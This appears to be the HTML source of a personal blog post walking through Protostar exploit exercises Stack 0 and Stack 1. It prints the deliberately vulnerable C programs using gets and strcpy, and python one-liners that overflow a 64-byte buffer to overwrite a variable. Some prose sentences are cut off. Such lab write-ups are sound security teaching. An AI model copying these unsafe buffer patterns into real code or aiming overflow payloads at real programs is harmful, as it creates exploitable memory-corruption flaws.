2016-06-15 00:03:17 -04:00
<!DOCTYPE html>
< html >
< head >
< meta charset = "utf-8" >
2016-06-15 01:06:03 -04:00
< script type = "text/javascript" >
var host = "paul.walko.org";
if ((host == window.location.host) & & (window.location.protocol != "https:"))
window.location.protocol = "https";
< / script >
2016-06-15 00:03:17 -04:00
< meta http-equiv = "X-UA-Compatible" content = "IE=edge" >
< meta name = "viewport" content = "width=device-width, initial-scale=1" >
< meta name = "description" content = "Walkthrough for Protostar exercises on exploit-exercises.com" >
2016-06-15 01:06:03 -04:00
< title > Protostar Exploit Exercises Solutions 0-1< / title >
2016-06-15 00:03:17 -04:00
<!-- favicon -->
2016-06-15 01:38:01 -04:00
< link rel = "apple-touch-icon" sizes = "57x57" href = "http://localhost:4000/favicon/apple-icon-57x57.png" >
< link rel = "apple-touch-icon" sizes = "60x60" href = "http://localhost:4000/favicon/apple-icon-60x60.png" >
< link rel = "apple-touch-icon" sizes = "72x72" href = "http://localhost:4000/favicon/apple-icon-72x72.png" >
< link rel = "apple-touch-icon" sizes = "76x76" href = "http://localhost:4000/favicon/apple-icon-76x76.png" >
< link rel = "apple-touch-icon" sizes = "114x114" href = "http://localhost:4000/favicon/apple-icon-114x114.png" >
< link rel = "apple-touch-icon" sizes = "120x120" href = "http://localhost:4000/favicon/apple-icon-120x120.png" >
< link rel = "apple-touch-icon" sizes = "144x144" href = "http://localhost:4000/favicon/apple-icon-144x144.png" >
< link rel = "apple-touch-icon" sizes = "152x152" href = "http://localhost:4000/favicon/apple-icon-152x152.png" >
< link rel = "apple-touch-icon" sizes = "180x180" href = "http://localhost:4000/favicon/apple-icon-180x180.png" >
< link rel = "icon" type = "image/png" sizes = "192x192" href = "http://localhost:4000/favicon/android-icon-192x192.png" >
< link rel = "icon" type = "image/png" sizes = "32x32" href = "http://localhost:4000/favicon/favicon-32x32.png" >
< link rel = "icon" type = "image/png" sizes = "96x96" href = "http://localhost:4000/favicon/favicon-96x96.png" >
< link rel = "icon" type = "image/png" sizes = "16x16" href = "http://localhost:4000/favicon/favicon-16x16.png" >
< link rel = "manifest" href = "http://localhost:4000/favicon/manifest.json" >
2016-06-15 00:03:17 -04:00
< meta name = "msapplication-TileColor" content = "#ffffff" >
< meta name = "msapplication-TileImage" content = "/ms-icon-144x144.png" >
< meta name = "theme-color" content = "#ffffff" >
2016-06-15 01:38:01 -04:00
< link rel = "stylesheet" type = "text/css" href = "http://localhost:4000/stylesheets/base.css" >
< link rel = "stylesheet" type = "text/css" href = "http://localhost:4000/stylesheets/simplePagination.css" >
2016-06-15 00:03:17 -04:00
2016-06-15 01:38:01 -04:00
< script type = "text/javascript" src = "http://localhost:4000/javascripts/jquery.js" > < / script >
2016-06-15 00:03:17 -04:00
2016-06-15 01:06:03 -04:00
< link rel = "canonical" href = " { { site.url } }{ { page.url } }" / >
2016-06-15 00:03:17 -04:00
<!-- [if lt IE 9]>
2016-06-15 01:38:01 -04:00
< script src = "http://localhost:4000/javascripts/html5shiv.js" > < / script >
2016-06-15 00:03:17 -04:00
<![endif]-->
2016-06-15 01:38:01 -04:00
< link rel = "stylesheet" type = "text/css" href = "http://localhost:4000/stylesheets/markdownreader.css" >
< link rel = "stylesheet" type = "text/css" href = "http://localhost:4000/stylesheets/pygments_monokai.css" >
< link rel = "stylesheet" type = "text/css" href = "http://localhost:4000/stylesheets/code_block.css" >
2016-06-15 00:03:17 -04:00
< / head >
< body >
< header id = "l-header" >
< div class = "container" >
< div class = "row logo" >
< div class = "col-lg-7" >
< h1 > Paul Walko< / h1 >
< / div >
< / div >
< div class = "row navicon" >
< a href = "" > < i class = "fa fa-navicon" > < / i > < / a >
< / div >
< div class = "row navbar" >
< nav class = "col-lg-8 col-md-8 col-xs-12" >
< ul class = "row" >
2016-06-15 01:38:01 -04:00
< li class = "col-lg-3" > < a href = "http://localhost:4000/" > HOME< / a > < / li >
2016-06-15 00:03:17 -04:00
< li class = "col-lg-3" >
< ul class = "subnav" >
< a href = "javascript:void(0)" > POSTS< / a >
2016-06-15 01:38:01 -04:00
< li > < a href = "http://localhost:4000/category" > CATEGORY< / a > < / li >
< li > < a href = "http://localhost:4000/tag" > TAG< / a > < / li >
2016-06-15 00:03:17 -04:00
< / ul >
< / li >
2016-06-15 01:38:01 -04:00
< li class = "col-lg-3" > < a href = "http://localhost:4000/about" > ABOUT< / a > < / li >
< li class = "col-lg-3" > < a href = "http://localhost:4000/resume" > RÉSUMÉ< / a > < / li >
2016-06-15 00:03:17 -04:00
< / ul >
< / nav >
< div class = "search col-lg-4 col-md-4 col-xs-12" >
< form id = "dummySearch" >
< label for = "search" > < / label >
< input id = "search" name = "serach" type = "text" placeholder = "Not That Dummy Search" >
< i class = "fa fa-search" > < / i >
< / form >
< script >
$(function(){
$('#dummySearch').submit(function(e) {
e.preventDefault();
keyword = $('#search').val();
2016-06-15 01:06:03 -04:00
url = 'https://www.google.com/search?q=site%3Apaul.walko.org+' + keyword;
2016-06-15 00:03:17 -04:00
location.href = url;
})
})
< / script >
< / div >
< / div >
< / div >
< / header >
< div class = "container" >
< div class = "row" >
< div id = "markdown-container" class = "col-lg-9" >
< header >
2016-06-15 01:06:03 -04:00
< p id = "postTitle" > Protostar Exploit Exercises Solutions 0-1< / p >
2016-06-15 00:03:17 -04:00
< ul class = "tags clearfix" >
< li > < i class = "fa fa-tag" > < / i > exploit-exercises< / li >
< li > < i class = "fa fa-tag" > < / i > protostar< / li >
< li > < i class = "fa fa-tag" > < / i > hacking< / li >
< / ul >
2016-06-15 01:38:01 -04:00
< p id = "postMeta" > posted on 14 Jun 2016 under category < a href = "http://localhost:4000/category/" > writeup< / a > < / p >
2016-06-15 00:03:17 -04:00
< / header >
2016-06-15 01:06:03 -04:00
< h1 id = "stack-0" > Stack 0< / h1 >
< p > Here’ ’ < / p >
< div class = "highlighter-rouge" > < pre class = "highlight" > < code > #include < stdlib.h>
#include < unistd.h>
#include < stdio.h>
int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];
modified = 0;
gets(buffer);
if(modified != 0) {
printf("you have changed the 'modified' variable\n");
} else {
printf("Try again?\n");
}
}
< / code > < / pre >
< / div >
< p > The first thing I took note of is the size of the < code class = "highlighter-rouge" > buffer< / code > : 64 bytes. After that, the program inputs text for < code class = "highlighter-rouge" > buffer< / code > , and then checks to see if you modified the < code class = "highlighter-rouge" > modified< / code > variable.
I’ ’ < / p >
< div class = "highlighter-rouge" > < pre class = "highlight" > < code > $ echo `python -c 'print "A"*64'` | ./stack0
Try again?
< / code > < / pre >
< / div >
< p > That works as expected, now with 65 bytes:< / p >
< div class = "highlighter-rouge" > < pre class = "highlight" > < code > $ echo `python -c 'print "A"*65'` | ./stack0
you have changed the 'modified' variable
< / code > < / pre >
< / div >
< p > Solved!< / p >
< h1 id = "stack-1" > Stack 1< / h1 >
< p > Here’ ’ < / p >
< div class = "highlighter-rouge" > < pre class = "highlight" > < code > #include < stdlib.h>
#include < unistd.h>
#include < stdio.h>
#include < string.h>
int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];
if(argc == 1) {
errx(1, "please specify an argument\n");
}
modified = 0;
strcpy(buffer, argv[1]);
if(modified == 0x61626364) {
printf("you have correctly got the variable to the right value\n");
} else {
printf("Try again, you got 0x%08x\n", modified);
}
}
< / code > < / pre >
< / div >
< p > Just like Stack 0, we’ < code class = "highlighter-rouge" > buffer< / code > array size 64 bytes and we’ < code class = "highlighter-rouge" > 0x61626364< / code > instead of just changing it like before.< / p >
< p > Keep in mind this is < a href = "https://en.wikipedia.org/wiki/Endianness" > little endian< / a > , so I’ < / p >
< div class = "highlighter-rouge" > < pre class = "highlight" > < code > $ ./stack1 `python -c 'print "A"*64'`
Try again, you got 0x00000000
< / code > < / pre >
< / div >
< p > That works as expected, now with the additional bytes:< / p >
< div class = "highlighter-rouge" > < pre class = "highlight" > < code > $ ./stack1 `python -c 'print "A"*64 + "\x64\x63\x62\x61"'`
you have correctly got the variable to the right value
< / code > < / pre >
< / div >
< p > Woo!< / p >
2016-06-15 00:03:17 -04:00
< / div >
< div id = "markdown-outline" class = "col-lg-3" >
< / div >
< div id = "disqus_thread" > < / div >
< script type = "text/javascript" >
/* * * CONFIGURATION VARIABLES * * */
var disqus_shortname = 'paulwalko';
/* * * DON'T EDIT BELOW THIS LINE * * */
(function() {
var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
(document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
})();
< / script >
< noscript > Please enable JavaScript to view the < a href = "https://disqus.com/?ref_noscript" rel = "nofollow" > comments powered by Disqus.< / a > < / noscript >
< / div >
< / div >
< footer id = "l-footer" >
< div class = "container" >
< div class = "row" >
< div id = "contact" class = "col-lg-6 col-lg-offset-1 col-md-6 col-md-offset-1 col-sm-9" >
< h3 > CONTACT< / h3 >
< div class = "row" >
< address id = "address" class = "col-lg-6 col-md-6 col-sm-6" >
United States< br >
Paul Walko< br >
< / address >
< ul class = "col-lg-6 col-md-6 col-sm-6" >
< li class = "email" > < i class = "fa fa-envelope" > < / i > < a href = "mailto:paulsw.pw@gmail.com" > paulsw.pw@gmail.com< / a > < / li >
< li class = "github" > < i class = "fa fa-github" > < / i > < a href = "https://www.github.com/paulwalko" > https://www.github.com/paulwalko< / a > < / li >
< / ul >
< / div >
< / div >
< / div >
< p id = "legal" >
Copyright (c) 2015 Paul Walko | Powered by < a href = "http://jekyllrb.com" > Jekyll< / a > & < a href = "http://github.com" > GitHub< / a > | designed & built by < a href = "http://unifreak.github.io" > UniFreak< / a >
< / p >
< / div >
< / footer >
2016-06-15 01:38:01 -04:00
< script type = "text/javascript" src = "http://localhost:4000/javascripts/base.js" > < / script >
2016-06-15 00:03:17 -04:00
2016-06-15 01:38:01 -04:00
< script type = "text/javascript" src = "http://localhost:4000/javascripts/markdownreader.js" > < / script >
2016-06-15 00:03:17 -04:00
< / body >
< / html >
